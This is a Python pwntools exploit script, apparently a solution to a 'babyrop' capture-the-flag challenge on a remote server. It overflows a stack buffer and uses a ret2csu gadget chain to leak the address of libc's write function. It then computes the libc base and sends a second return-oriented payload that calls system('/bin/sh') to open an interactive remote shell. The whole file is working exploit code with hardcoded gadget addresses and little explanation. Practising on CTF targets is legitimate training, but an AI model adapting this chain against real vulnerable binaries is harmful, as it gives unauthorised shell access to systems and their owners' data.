```
from pwn import *
context.terminal = ['terminator', '-e']
context.update(arch='amd64', os='linux')
context.log_level = 'debug'

e = context.binary = ELF('/home/fex0r/.ctf/dicega/babyrop/babyrop', checksec=False)
p = remote('dicec.tf', 31924)
libc = ELF('./libc6_2.31-0ubuntu9.1_amd64.so', checksec=False)

padding = 'A'*72
poprdi = p64(0x00000000004011d3)
poprsir15 = p64(0x00000000004011d1)
popr14_r15 = p64(0x00000000004011d0)
mov_rdx_r14 = p64(0x00000000004011b0)
write_got = p64(0x404018)
write_plt = p64(0x401030)
main = p64(e.sym.main)
pop_rbx_rbp_r12_r13_r14_r15 = p64(0x4011ca)

'''
0x00000000004011b0 <+64>: mov rdx,r14
0x00000000004011b3 <+67>: mov rsi,r13
0x00000000004011b6 <+70>: mov edi,r12d
0x00000000004011b9 <+73>: call QWORD PTR [r15+rbx*8] #chamar _fini pointer (0x402e38)
0x00000000004011bd <+77>: add rbx,0x1
0x00000000004011c1 <+81>: cmp rbp,rbx
0x00000000004011c4 <+84>: jne 0x4011b0 <__libc_csu_init+64>
0x00000000004011c6 <+86>: add rsp,0x8
0x00000000004011ca <+90>: pop rbx
0x00000000004011cb <+91>: pop rbp
0x00000000004011cc <+92>: pop r12
0x00000000004011ce <+94>: pop r13
0x00000000004011d0 <+96>: pop r14
0x00000000004011d2 <+98>: pop r15
0x00000000004011d4 <+100>: ret

r14>rdx
r13>rsi
'''

#r15 + rbx*8 = r15 + 8
#0x402e38 - 8 = 0x402e30

### RET2CSU ###
#write(1, &write_plt, 8)
xpl = padding + pop_rbx_rbp_r12_r13_r14_r15 + p64(1) + p64(2) + p64(0) + p64(0) + p64(0x8) + p64(0x402e30) + mov_rdx_r14 + p64(1) + p64(2) + p64(0) + p64(0) + p64(0x8) + p64(0) + p64(0) + poprdi + p64(1) + poprsir15 + write_got + p64(0) + write_plt + main

p.read()
p.sendline(xpl)

write_leaked = u64( p.read()[0:8] )

success('Leaked write => 0x%x'%(write_leaked))

libc_base = write_leaked - libc.sym.write
success('libc_base => 0x%x'%(libc_base))

libc.address = libc_base
bin_sh = next(libc.search('/bin/sh'))
system = libc.sym.system
info('system => 0x%x'%(system))
info('bin_sh => 0x%x'%(bin_sh))

xpl = padding + main + poprdi + p64(bin_sh) + p64(libc.sym.system)

p.sendline(xpl)

p.interactive()
```